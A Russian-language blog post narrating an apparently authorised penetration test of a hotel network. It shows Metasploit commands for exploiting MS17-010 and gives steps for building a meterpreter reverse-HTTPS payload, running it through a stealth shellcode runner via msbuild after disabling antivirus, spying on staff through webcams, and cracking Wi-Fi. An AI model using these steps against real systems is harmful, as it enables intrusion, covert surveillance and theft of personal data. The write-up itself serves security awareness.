November 29, 2023

Взлом Отеля

​Сегодня речь пойдет про пентест отеля. Все действия были регламентированы и выполнялись в рамках проекта.

​Все совпадения описанные в данной статье являются случайными, а персонажи вымышленными.

По согласованию данного проекта, я должен был протестировать сеть гостишки и попробовать нанести хоть какой то импакт. Первым делом я начал искать роутер в номере, но его не оказалось, а сетевая розетка была обнаружена за TV.

Не долго думая, я подрубился в сеть и начал сканирование на предмет Gateway.

Определив, адресацию, включил скан на всю 24 подсеть. Там нашлось много чего, как всегда это были Win7, Win Server 2008 и далее по списку. Окей, самые простые цели у нас это семерочки, которые я посканировал модулем метасплоита:

msf > use auxiliary/scanner/smb/smb_ms17_010

Обнаружил что 2 из 5 хостов содержат MS17-010 и в ход пошел модуль:

use auxiliary/admin/smb/ms17_010_commandДалее смог протолкнуться на хост директора и администратора на ресепшен.

Директорский ПК содержал информацию: договоры , документы для налоговой, пару паспортов и токены.

Что касается ПК персонала, то там огромная база паспортов, договоров, фоток. Короче пак персональных данных.

Далее необходимо было сделать закрепление, т.к. сидеть сутками не сильно интересное занятие. Сняв админские креды я аутентифицировался на Win 10 - это был второй ПК на ресепшене. Для закрепа будучи с правами Администратора мне потребовалось отключил AV и воспользовался техникой получения обратной оболочки от метера.

Эта методика позволяет обойти некоторую защиту и оставаться в системе более менее без палева, напишу шаги для реализации:

1) Генерируем полезную нагрузку через фреймфорк:

msfvenom -p windows/×64/meterpreter/reverse_https LOST=192.168.49.122 LPORT=443 -f raw -o meter.bin

2) Клонируем себе репу: https://github.com/kymb0/Stealth_shellcode_runners и запускаем генерацию xml файлика:

generator.py meter.bin

3) Запускаем встроенный майками билдер на атакуемом хосте

C: \Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

Теперь имея оболочку метера я мог наблюдать в лайф режиме за персоналом через веб-камеру, делать снапшоты рабочего стола, слушать о чем говорят сотрудники и так далее.

Какой импакт на текущем шаге я имел:

  • захват персональных данных (актуальных)
  • доступ к документации
  • доступ ко всем хостам в локальной сети
  • возможность сталкерить за сотрудниками (веб-камеры, переписки, разговоры и т.п.)

Оставим в покое тему что я нашел еще на сетевых узлах, т.к. логически можно прикинуть самому.

Далее пошло в ход тестирование Wi-Fi сети, где через WPA получилось хакнуть 16 точек, в том числе соседнюю кафешку :D Ее я тестить конечно же не стал... с ТЗ такого не было.

Через вафлю как полагается по старым следам сделал все тоже самое, что и через провод.

В ходе проведения работ выяснилось, что кафе принадлежало тому же владельцу, что и гостиница, поэтому ее поковырять мне также разрешили.

Там из интересного были найдены технологические карты по приготовлению блюд и коктейлей :D

Итог: непонятно теперь, как при заселении в гостишку давать свой паспорт для регистрации, зная что он может попасть в руки мошеннику или хакеру. Ведь это был тест всего одной гостиницы, а сколько таких по стране...

Берегите себя и свои персональные данные!